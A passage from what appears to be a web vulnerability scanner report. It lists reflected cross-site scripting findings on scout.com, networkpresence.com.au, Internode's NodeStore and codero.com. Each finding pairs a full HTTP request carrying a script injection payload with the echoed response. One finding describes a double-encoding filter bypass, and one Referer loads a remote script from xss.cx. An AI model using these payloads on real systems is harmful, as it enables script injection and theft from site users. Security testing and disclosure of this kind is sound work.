$.analytics.reportdbcf9<script>alert(1)</script>61fc8dfb92f({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"Search","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","second":""
...[SNIP]...

2.4. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9bd93<img%20src%3da%20onerror%3dalert(1)>5b0d6ee6d38 was submitted in the callback parameter. This input was echoed as 9bd93<img src=a onerror=alert(1)>5b0d6ee6d38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adfeed.ashx?s=143&p=undefined&c=undefined&format=json&callback=$.showAd.cacheAdCodes9bd93<img%20src%3da%20onerror%3dalert(1)>5b0d6ee6d38 HTTP/1.1
Host: cdn-forums.scout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: __utma=202704078.1310038920.1308590023.1308597903.1310666427.3; __utmz=202704078.1310666427.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; UnicaNIODID=pRNfMHC9Ow1-XCX0Xfv; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd8
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 132
Date: Tue, 19 Jul 2011 12:05:00 GMT
Connection: close
Akamai: True

$.showAd.cacheAdCodes9bd93<img src=a onerror=alert(1)>5b0d6ee6d38({"ads":[],"contentTypeId":0,"pageId":0,"siteId":143,"type":"MSN"})

2.5. http://networkpresence.com.au/index.php/Services/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /index.php/Services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e462681da7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32a10"><script>alert(1)</script>462681da7d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/Services/?32a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e462681da7d9=1 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:48 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23909
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/index.php/Services/feed/rss.html?32a10"><script>alert(1)</script>462681da7d9=1" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.6. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 5b7f5<img%20src%3da%20onerror%3dalert(1)>06ea9cea3f3 was submitted in the h parameter. This input was echoed as 5b7f5<img src=a onerror=alert(1)>06ea9cea3f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=3085b7f5<img%20src%3da%20onerror%3dalert(1)>06ea9cea3f3&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 5186
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
33;width:712px;}
#fpss-container {/*clear:both;*/padding:0;margin:0;position:relative;text-align:left;width:712px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:520px;height:3085b7f5<img src=a onerror=alert(1)>06ea9cea3f3px;}

#slide-loading {background:#000 url(loading_black.gif) no-repeat center;margin:0;padding:0;width:520px;height:3085b7f5<img src=a onerror=alert(1)>
...[SNIP]...

2.7. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [sw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the sw request parameter is copied into the HTML document as plain text between tags. The payload 67451<img%20src%3da%20onerror%3dalert(1)>da9243592bc was submitted in the sw parameter. This input was echoed as 67451<img src=a onerror=alert(1)>da9243592bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=19267451<img%20src%3da%20onerror%3dalert(1)>da9243592bc HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 4976
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
lidetext {margin:0;padding:4px 12px;}

/* --- Navigation Buttons --- */

#navi-outer {position:absolute;    top:0; right:0;/*clear:both;*/    margin:0;    padding:0;    color:#000000;    overflow:hidden;width:19267451<img src=a onerror=alert(1)>da9243592bcpx;height:308px;    background-color: #ffffff;}
#navi-outer ul {padding:0;margin:0;background:none;text-align:left;}
#navi-outer li {display:inline;padding:0;margin:0;border:none;height:56px;list-style:
...[SNIP]...

2.8. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload c6ccf<img%20src%3da%20onerror%3dalert(1)>59e73d38178 was submitted in the w parameter. This input was echoed as c6ccf<img src=a onerror=alert(1)>59e73d38178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520c6ccf<img%20src%3da%20onerror%3dalert(1)>59e73d38178&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 5054
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
:0px solid #333;width:712px;}
#fpss-container {/*clear:both;*/padding:0;margin:0;position:relative;text-align:left;width:712px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:520c6ccf<img src=a onerror=alert(1)>59e73d38178px;height:308px;}

#slide-loading {background:#000 url(loading_black.gif) no-repeat center;margin:0;padding:0;width:520c6ccf<img src=a onerror=alert(1)>
...[SNIP]...

2.9. https://secure2.internode.on.net/nodestore/cart/build [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/build

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34f6b"><a>84f479d6a18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nodestore/cart/build34f6b"><a>84f479d6a18?customer_kind=residential&broadband=easy_naked&value_packs=5 HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:11:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4302
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_build34f6b"><a>84f479d6a18">
...[SNIP]...

2.10. https://secure2.internode.on.net/nodestore/cart/save/order/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save/order/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e977"><img%20src%3da%20onerror%3dalert(1)>be29bd4cc6f was submitted in the REST URL parameter 3. This input was echoed as 5e977"><img src=a onerror=alert(1)>be29bd4cc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save5e977"><img%20src%3da%20onerror%3dalert(1)>be29bd4cc6f/order/?format=json&password HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/checkout/customer/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:11:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4350
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_save5e977"><img src=a onerror=alert(1)>be29bd4cc6f">
...[SNIP]...

2.11. https://secure2.internode.on.net/nodestore/cart/save/order/undefined [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save/order/undefined

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 890f6"><img%20src%3da%20onerror%3dalert(1)>f38abd0499a was submitted in the REST URL parameter 3. This input was echoed as 890f6"><img src=a onerror=alert(1)>f38abd0499a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save890f6"><img%20src%3da%20onerror%3dalert(1)>f38abd0499a/order/undefined?format=json&password HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/?format=json&password
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:14:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4350
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_save890f6"><img src=a onerror=alert(1)>f38abd0499a">
...[SNIP]...

2.12. https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b947<img%20src%3da%20onerror%3dalert(1)>8cd3a062984 was submitted in the REST URL parameter 3. This input was echoed as 8b947<img src=a onerror=alert(1)>8cd3a062984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f8b947<img%20src%3da%20onerror%3dalert(1)>8cd3a062984/order/a HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/?format=json&password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:14:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4476
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<img src=a onerror=alert(document.location)>be29bd4cc6f8b947<img src=a onerror=alert(1)>8cd3a062984">
...[SNIP]...

2.13. http://www.codero.com/images/design/banner-green-bundle.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner-green-bundle.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c13"><script>alert(1)</script>b2bab450492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images84c13"><script>alert(1)</script>b2bab450492/design/banner-green-bundle.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:30 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32034
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images84c13"><script>alert(1)</script>b2bab450492/design/banner-green-bundle.png" />
...[SNIP]...

2.14. http://www.codero.com/images/design/banner-priceMatch.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner-priceMatch.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40e9"><script>alert(1)</script>30c84889aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesd40e9"><script>alert(1)</script>30c84889aac/design/banner-priceMatch.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:29 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 31999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/imagesd40e9"><script>alert(1)</script>30c84889aac/design/banner-priceMatch.png" />
...[SNIP]...

2.15. http://www.codero.com/images/design/banner_50off-promo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_50off-promo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e54f"><script>alert(1)</script>9f713150a78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images2e54f"><script>alert(1)</script>9f713150a78/design/banner_50off-promo.png?time=1308169754 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:33 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32045
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images2e54f"><script>alert(1)</script>9f713150a78/design/banner_50off-promo.png" />
...[SNIP]...

2.16. http://www.codero.com/images/design/banner_certified-expertise.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_certified-expertise.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106c4"><script>alert(1)</script>1ca562d2af6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images106c4"><script>alert(1)</script>1ca562d2af6/design/banner_certified-expertise.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:32 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
